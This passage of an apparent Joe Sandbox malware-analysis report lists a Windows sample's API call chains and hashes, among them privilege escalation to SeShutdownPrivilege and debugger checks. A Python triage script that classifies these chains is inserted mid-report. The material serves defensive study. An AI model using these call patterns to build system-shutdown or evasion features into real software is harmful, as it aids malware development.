                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorExitLastThread
                              • String ID:
                              • API String ID: 1611280651-0
                              • Opcode ID: 2b8b68d0185ef28905bdcb69da9b3f8ead87d4d034e1021b3168159df9b98e2b
                              • Instruction ID: 36bc7f084a7875837e2e80c67bd8bd233f8cb98339042f7acc5745242aff1cfa
                              • Opcode Fuzzy Hash: 2b8b68d0185ef28905bdcb69da9b3f8ead87d4d034e1021b3168159df9b98e2b
                              • Instruction Fuzzy Hash: C8F0C2B5A4060CAFDF04AFB0C409AAE7B78FF45319F244649E815A7B41CF755906CFA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              • Opcode ID: 641fb041f8b0a25d13cf40cd748b45734cf5153e1432fdabc9cbb0deabd27556
                              • Instruction ID: cdfbd7df002d920db229a9294d77a58dcb24c111738dc68c14c321061089edb2
                              • Opcode Fuzzy Hash: 641fb041f8b0a25d13cf40cd748b45734cf5153e1432fdabc9cbb0deabd27556
                              • Instruction Fuzzy Hash: 0A118C71A0420EAFCF05CF59E945D9B7BF9EF48304F004059F814AB301D631E911CBA4
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction ID: af4b2e3ce9aea144d3c6894fc030911adaa5685873841f986adc815a442704f1
                              • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction Fuzzy Hash: 50012872D0115DAFCF029FA88D00AEEBFB9AB18214F144165AD24F26A0E7318A25DB91
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000000,?,6C304115,?,?,00000000,?,6C304115,00000000,0000000C), ref: 6C304474
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 24fd705929f3b6ae03e5521d87b0286eb151d88419268b62a0e0d950aa1c79c6
                              • Instruction ID: 1b254b7fcd3526189b8043b81721e60ea202bde090e2a3962b8991108b7f3105
                              • Opcode Fuzzy Hash: 24fd705929f3b6ae03e5521d87b0286eb151d88419268b62a0e0d950aa1c79c6
                              • Instruction Fuzzy Hash: A7D06C3210010DBFDF028E84DC06EDA3BAAFB88714F018000BA5866020C732E971AB90
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction ID: bf24b7f5003961f6364638f2132460500347d0e5d5a88e9aace220a6190adfdc
                              • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction Fuzzy Hash:
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: g)''
                              • API String ID: 4218353326-3487984327
                              • Opcode ID: 9f19ac9f07dd5ced80103f670decb9ab454692c5f22baee37e14bb1ef69d6d02
                              • Instruction ID: 85709a7cefe0e4a6357ad9877e8e648f6cc6f4c4e1776fe50506c75b41c60297
                              • Opcode Fuzzy Hash: 9f19ac9f07dd5ced80103f670decb9ab454692c5f22baee37e14bb1ef69d6d02
                              • Instruction Fuzzy Hash: 30633571644B068FC728CF28C8C0A95B3F3BFC93197998A6DC8D65BA55E774B44ACB40
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 6C2E5D6A
                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C2E5D76
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C2E5D84
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C2E5DAB
                              • NtInitiatePowerAction.NTDLL ref: 6C2E5DBF
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3256374457-3733053543
                              • Opcode ID: 6258f97c2c8a7c979bd6d2aafcf8d3ab70230cca2b6ee81ae8a6483909694b40
                              • Instruction ID: 8cf84d185720a2c63df7f62e461e7cbdc88626c5303bc80bd5ddc554114a7b88
                              • Opcode Fuzzy Hash: 6258f97c2c8a7c979bd6d2aafcf8d3ab70230cca2b6ee81ae8a6483909694b40
                              • Instruction Fuzzy Hash: E2F0B470A44300BBEA507BA4DD0EB5A7BBCEF4D701F014509F985AA0C1D7706894CB96
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: \j`7$\j`7$j
                              • API String ID: 0-3644614255
                              • Opcode ID: 77e8f18237a1cf5401fbed5ac80cba6fcfe741d288a4b2f1991248522dbdab0a
                              • Instruction ID: bc1f27d5dae569488d7618112c310858a21bfd705734711c7a6efaaf63c1aeb6
                              • Opcode Fuzzy Hash: 77e8f18237a1cf5401fbed5ac80cba6fcfe741d288a4b2f1991248522dbdab0a
                              • Instruction Fuzzy Hash: 904223746093828FCB14CF6AC48066ABBE1AFDA358F244A1EE496C7B61D334D855CF53
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C3784B1
                                • Part of subcall function 6C37993B: __EH_prolog.LIBCMT ref: 6C379940
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 1$`)K$h)K
                              • API String ID: 3519838083-3935664338
                              • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                              • Instruction ID: 11a4ac271c1c4a04244c2e1810b4b26e554a92642f769430193210932bee10be
                              • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                              • Instruction Fuzzy Hash: DBF28D30D04248DFDF21CFA8C888BDDBBB5AF49318F244199D449AB781DB799A85CF25
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C36AEF4
                                • Part of subcall function 6C36E622: __EH_prolog.LIBCMT ref: 6C36E627
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $h%K
                              • API String ID: 3519838083-1737110039
                              • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                              • Instruction ID: e182c2e021be56a7a65eae63b9f3fe7412b8b4a7cd30830187b7da9eb1a1f994
                              • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                              • Instruction Fuzzy Hash: EE538A30901258DFDF15CFA5C994BDDBBB4AF09308F244098D489ABB95CB719E89CF62
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $J
                              • API String ID: 3519838083-1755042146
                              • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                              • Instruction ID: b7d86f0f06930407e60a8e03da2bbd2b15586c9e55b9f8a8352f2e308c0ed0fd
                              • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                              • Instruction Fuzzy Hash: 0FE2EE30905289DFEF21CFA8C598BDDBBB4AF05308F248089E855AB681CB79D945CF75
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C346CE5
                                • Part of subcall function 6C31CC2A: __EH_prolog.LIBCMT ref: 6C31CC2F
                                • Part of subcall function 6C31E6A6: __EH_prolog.LIBCMT ref: 6C31E6AB
                                • Part of subcall function 6C346A0E: __EH_prolog.LIBCMT ref: 6C346A13
                                • Part of subcall function 6C346837: __EH_prolog.LIBCMT ref: 6C34683C
                                • Part of subcall function 6C34A143: __EH_prolog.LIBCMT ref: 6C34A148
                                • Part of subcall function 6C34A143: ctype.LIBCPMT ref: 6C34A16C
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog$ctype
                              • String ID:
                              • API String ID: 1039218491-3916222277
                              • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                              • Instruction ID: 74395eb31bce4cb07c7ced2c30c5087347a814e46c489951600b2aee33d96ede
                              • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                              • Instruction Fuzzy Hash: CD03AD30805298DEDF15CFA4C950BDCBBF1AF16308F24809AD489A7A91DB745B8DDF62
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 3J$`/J$`1J$p0J
                              • API String ID: 0-2826663437
                              • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                              • Instruction ID: 37ff9e02e48f7f519d172b78d69248b7b5dae980a406d21d48f424c839f0fa6f
                              • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                              • Instruction Fuzzy Hash: 3D410A71F10A200BF3488E7A8C856667FC3C7CA346B49C23DD565C7AD9DA7DC40786A4
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: W
                              • API String ID: 3519838083-655174618
                              • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                              • Instruction ID: 2c9e2dd9dda6dfc52ccf70c7b5f0f504cf3a7de1d740463ef0fd85266eb40a6d
                              • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                              • Instruction Fuzzy Hash: 56B28C71A01299DFDB20CFA8C594B9EBBB4AF09308F244099E849EB741C77ADD41CF65
                              APIs
                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C2F0279
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C2F0283
                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C2F0290
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                              • String ID:
                              • API String ID: 3906539128-0
                              • Opcode ID: 36377216b64967ec6a29fa20b1faae96816653887064f5eaf81abbb76c0a6f52
                              • Instruction ID: c5688f58054155a0a04b22ea853b22cb8a8bf2af4faf00910d6e0860f4153a33
                              • Opcode Fuzzy Hash: 36377216b64967ec6a29fa20b1faae96816653887064f5eaf81abbb76c0a6f52
                              • Instruction Fuzzy Hash: 9731C47494121D9BCB21DF29D888BCDBBB8FF08314F5041DAE81DA7650EB709B858F54
                              APIs
                              • GetCurrentProcess.KERNEL32(?,?,6C2EF235,?,?,?,?), ref: 6C2EF19F
                              • TerminateProcess.KERNEL32(00000000,?,6C2EF235,?,?,?,?), ref: 6C2EF1A6
                              • ExitProcess.KERNEL32 ref: 6C2EF1B8
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                               • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: c5c205c459e6b9fc60f992f2b28447f3a8ba549171b45eec5120d7b7046907f0
                              • Instruction ID: 995ed13be62707ec4b9ddf45022dca6d43c31102a618e9c336d3f75644ade91c
                              • Opcode Fuzzy Hash: c5c205c459e6b9fc60f992f2b28447f3a8ba549171b45eec5120d7b7046907f0
                              • Instruction Fuzzy Hash: E8E0463210060CAFCF023F58D809A8A3B38FB4A35AB500414F818DAA21CB35D982CA60
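                               Triaging the API chains listed in these entries, as an added example that is not part of the Joe Sandbox report and not the sample's own code: it parses "APIs" lines in the format shown above (the SeShutdownPrivilege chain, the IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter chain, the GetCurrentProcess / TerminateProcess / ExitProcess chain and an __EH_prolog entry with a "Part of subcall function" sub-line), decodes the 0x28 access mask passed to OpenProcessToken (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, bit values from winnt.h) and classifies each chain. The rule names, the POWER_APIS set and the reading of the last two chains as the MSVC CRT abort and exit paths rather than bespoke anti-debugging are this example's own judgement, not something the report states.

```python
"""Triage of per-function "APIs" chains in a Joe Sandbox report. Added example,
not Joe Sandbox or sample code; rule names, POWER_APIS and the CRT judgements
are this example's own assumptions."""
import re
from dataclasses import dataclass
from typing import List, Optional

# "• Api.MODULE(args), ref: ADDR", optionally after "Part of subcall function ADDR:".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[\w:~]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")

# Token access-mask bits from winnt.h; decodes OpenProcessToken's 2nd argument.
TOKEN_ACCESS = {
    0x01: "TOKEN_ASSIGN_PRIMARY", 0x02: "TOKEN_DUPLICATE", 0x04: "TOKEN_IMPERSONATE",
    0x08: "TOKEN_QUERY", 0x10: "TOKEN_QUERY_SOURCE", 0x20: "TOKEN_ADJUST_PRIVILEGES",
    0x40: "TOKEN_ADJUST_GROUPS", 0x80: "TOKEN_ADJUST_DEFAULT", 0x100: "TOKEN_ADJUST_SESSIONID"}
# APIs that perform a power transition once SeShutdownPrivilege is enabled (assumed set).
POWER_APIS = {"NtInitiatePowerAction", "NtShutdownSystem", "ExitWindowsEx",
              "InitiateSystemShutdownW", "InitiateSystemShutdownExW", "InitiateShutdownW"}

@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]  # callee address when the line is an indented sub-entry

def parse_entries(text):
    """Split at each "APIs" header; return one Call list per function entry."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            entries.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.append(Call(m["api"], m["module"], args, m["ref"], m["sub"]))
    return entries

def decode_token_access(hex_mask):
    value = int(hex_mask, 16)
    return [name for bit, name in sorted(TOKEN_ACCESS.items()) if value & bit]

def classify(entry):
    """Return (rule, detail) pairs for one function's API chain."""
    names = {c.api for c in entry}
    findings = []
    # The privilege name is LookupPrivilegeValueA/W's 2nd argument.
    privs = {c.args[1] for c in entry
             if c.api.startswith("LookupPrivilegeValue") and len(c.args) > 1}
    if "SeShutdownPrivilege" in privs and "AdjustTokenPrivileges" in names and names & POWER_APIS:
        access = [decode_token_access(c.args[1]) for c in entry
                  if c.api == "OpenProcessToken" and len(c.args) > 1]
        findings.append(("shutdown_capability", f"enables SeShutdownPrivilege, calls "
                         f"{sorted(names & POWER_APIS)}, token opened with {access}"))
    # The report lists the stack as seen at the call, so the first value is argument 1.
    if {"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"} <= names:
        suef = next(c for c in entry if c.api == "SetUnhandledExceptionFilter")
        if suef.args[:1] == ["00000000"]:
            findings.append(("crt_fail_fast", "IsDebuggerPresent, SetUnhandledExceptionFilter(NULL),"
                             " UnhandledExceptionFilter: MSVC CRT abort path, not bespoke anti-debugging"))
    if {"GetCurrentProcess", "TerminateProcess", "ExitProcess"} <= names:
        findings.append(("crt_exit", "TerminateProcess(GetCurrentProcess()) then ExitProcess: CRT exit path"))
    return findings

def triage(text):
    return [(i, rule, detail) for i, entry in enumerate(parse_entries(text))
            for rule, detail in classify(entry)]

# Input: the API lines of four entries copied from this report.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32 ref: 6C2E5D6A
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C2E5D76
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C2E5D84
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C2E5DAB
• NtInitiatePowerAction.NTDLL ref: 6C2E5DBF
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C2F0279
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C2F0283
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C2F0290
APIs
• GetCurrentProcess.KERNEL32(?,?,6C2EF235,?,?,?,?), ref: 6C2EF19F
• TerminateProcess.KERNEL32(00000000,?,6C2EF235,?,?,?,?), ref: 6C2EF1A6
• ExitProcess.KERNEL32 ref: 6C2EF1B8
APIs
• __EH_prolog.LIBCMT ref: 6C3784B1
  • Part of subcall function 6C37993B: __EH_prolog.LIBCMT ref: 6C379940
"""

if __name__ == "__main__":
    for idx, rule, detail in triage(SAMPLE):
        print(f"entry {idx}: {rule}: {detail}")
```

                               The first finding is the evidence behind the report's "Contains functionality to shutdown / reboot the system" signature; the other two show why an IsDebuggerPresent hit on its own is weak evidence, since this exact call order is what the compiler's runtime emits for abort and exit, and a triage rule should weight it accordingly.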
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C36489B
                                • Part of subcall function 6C365FC9: __EH_prolog.LIBCMT ref: 6C365FCE
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
                               • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @ K
                              • API String ID: 3519838083-4216449128
                              • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                              • Instruction ID: aaefd1a3ef9263af3a08288b6ef80b1905db2f72dd9415b881b54b2e503aa203
                              • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                              • Instruction Fuzzy Hash: 1DD1CD31E042049FDB14CFA6C4A0BDEBBB6FB84318F14812AE495ABF88CB759845CF55
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C318000, based on PE: true
